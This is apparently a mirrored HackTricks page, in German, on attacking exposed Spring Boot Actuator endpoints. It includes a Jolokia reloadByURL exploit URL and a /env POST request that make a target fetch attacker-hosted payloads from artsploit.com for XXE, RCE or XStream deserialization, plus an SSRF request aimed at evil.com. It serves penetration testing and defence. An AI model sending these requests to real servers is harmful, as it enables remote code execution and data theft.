mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 12:33:39 +00:00
73 lines
4.7 KiB
Markdown
73 lines
4.7 KiB
Markdown
# Spring Actuators
|
|
|
|
<details>
|
|
|
|
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
|
|
|
|
</details>
|
|
|
|
## **Spring Auth Bypass**
|
|
|
|
<figure><img src="../../.gitbook/assets/image (927).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Von** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
|
|
|
|
## Ausnutzen von Spring Boot Actuators
|
|
|
|
**Überprüfen Sie den Originalbeitrag von** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
|
|
|
|
### **Schlüsselpunkte:**
|
|
|
|
* Spring Boot Actuators registrieren Endpunkte wie `/health`, `/trace`, `/beans`, `/env` usw. In den Versionen 1 bis 1.4 sind diese Endpunkte ohne Authentifizierung zugänglich. Ab Version 1.5 sind standardmäßig nur `/health` und `/info` nicht sensitiv, aber Entwickler deaktivieren diese Sicherheit oft.
|
|
* Bestimmte Actuator-Endpunkte können sensible Daten offenlegen oder schädliche Aktionen ermöglichen:
|
|
* `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart` und `/heapdump`.
|
|
* In Spring Boot 1.x sind Actuators unter der Stamm-URL registriert, während sie in 2.x unter dem Basispfad `/actuator/` stehen.
|
|
|
|
### **Ausbeutungstechniken:**
|
|
|
|
1. **Remote Code Execution über '/jolokia'**:
|
|
* Der `/jolokia`-Actuator-Endpunkt gibt die Jolokia-Bibliothek frei, die HTTP-Zugriff auf MBeans ermöglicht.
|
|
* Die Aktion `reloadByURL` kann ausgenutzt werden, um Logging-Konfigurationen von einer externen URL neu zu laden, was zu blindem XXE oder Remote Code Execution über speziell erstellte XML-Konfigurationen führen kann.
|
|
* Beispiel-Exploit-URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
|
|
2. **Konfigurationsänderung über '/env'**:
|
|
* Wenn Spring Cloud Libraries vorhanden sind, ermöglicht der Endpunkt `/env` die Änderung von Umgebungseigenschaften.
|
|
* Eigenschaften können manipuliert werden, um Schwachstellen auszunutzen, wie die XStream-Deserialisierungsschwachstelle im Eureka-ServiceURL.
|
|
* Beispiel-Exploit-POST-Anfrage:
|
|
|
|
```
|
|
POST /env HTTP/1.1
|
|
Host: 127.0.0.1:8090
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 65
|
|
|
|
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
|
|
```
|
|
3. **Weitere nützliche Einstellungen**:
|
|
* Eigenschaften wie `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url` und `spring.datasource.tomcat.max-active` können für verschiedene Exploits manipuliert werden, wie SQL-Injection oder Änderung von Datenbankverbindungszeichenfolgen.
|
|
|
|
### **Zusätzliche Informationen:**
|
|
|
|
* Eine umfassende Liste der Standard-Actuators finden Sie [hier](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
|
|
* Der Endpunkt `/env` in Spring Boot 2.x verwendet JSON-Format für die Eigenschaftsänderung, aber das allgemeine Konzept bleibt dasselbe.
|
|
|
|
### **Verwandte Themen:**
|
|
|
|
1. **Env + H2 RCE**:
|
|
* Details zur Ausnutzung der Kombination aus `/env`-Endpunkt und H2-Datenbank finden Sie [hier](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
|
|
2. **SSRF auf Spring Boot durch falsche Interpretation des Pfadnamens**:
|
|
* Die Behandlung von Matrixparametern (`;`) im HTTP-Pfadnamen des Spring-Frameworks kann für Server-seitige Anfragenfälschung (SSRF) ausgenutzt werden.
|
|
* Beispiel-Exploit-Anfrage:
|
|
|
|
```http
|
|
GET ;@evil.com/url HTTP/1.1
|
|
Host: target.com
|
|
Connection: close
|
|
```
|